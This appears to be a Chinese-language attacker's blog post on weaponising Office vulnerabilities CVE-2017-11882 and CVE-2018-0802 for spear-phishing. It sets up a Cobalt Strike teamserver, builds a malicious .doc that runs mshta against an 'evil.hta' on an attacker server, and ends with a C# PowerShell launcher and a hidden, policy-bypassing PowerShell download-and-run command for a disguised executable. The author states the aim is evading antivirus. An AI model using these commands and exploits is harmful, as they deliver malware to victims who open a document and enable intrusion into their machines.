看了一天apt报告，主流利用Office鱼叉攻击的漏洞，还是这Microsoft Office CVE-2017-8570，CVE-2017-11882和CVE-2018-0802 三个，而且都知道office一般都不更新，很容易打开就中。但是doc免杀比较难，很容易被杀，比如主流的mshta这种方式。

 

利用脚本：

     这个脚本集成了两个漏洞

也可以使用msf模块。

 

Linux (Kali 2018.4, Ubuntu 18.04)

1. Update APT
   sudo apt-get update
2. Install OpenJDK 11 with APT
   sudo apt-get install openjdk-11-jdk
3. Make OpenJDK 11 the default:
   sudo update-java-alternatives -s java-1.11.0-openjdk-amd64

Linux (Other)

1. 1. Uninstall the current OpenJDK package(s)
   2. Download OpenJDK for Linux/x64 at: 
   3. Extract the OpenJDK binary:
      tar zxvf openjdk-11.0.1_linux-x64_bin.tar.gz
   4. Move the OpenJDK folder to /usr/local:
      mv jdk-11.0.1 /usr/local
   5. Add the following to ~/.bashrc
      JAVA_HOME="/usr/local/jdk-11.0.1" 

      PATH=$PATH:$JAVA_HOME/bin
   6. Refresh your ~/.bashrc to make the new environment variables take effect
      source ~/.bashrc

具体环境安装可以参考cobalt strike官方。

 

chmod +x teamserver

nohup ./teamserver IP 密码 &

先使用cobalt strike 生成一个hta的payload

python webdav_exec_CVE-2017-11882.py -u http://xxxxx.xx.xxx:8001/evil.hta -e "mshta http://xxxx.x.x.x.x:8001/evil.hta" -o test.doc

python RTF_11882_0802.py -c "mshta http://xx.xxx.xx.xx:8001/evil.hta" -o test.doc

 

 

也可以参考这边文章：

 

using System;

using System.Collections.Generic;

using System.Linq;

using System.Text;

using System.Threading.Tasks;

namespace shell

{

class Program

{

static void Main(string[] args)

{

string strCmdText;

strCmdText = "your-powershell-here";

System.Diagnostics.Process.Start("powershell.exe", strCmdText);

}

}

}

 powershell -nop -w hidden -Exec Bypass -Command (New-Object System.Net.WebClient).DownloadFile('http://xx.xx.xx.xx.xx/notepad.exe','notepad.exe');start-process notepad.exe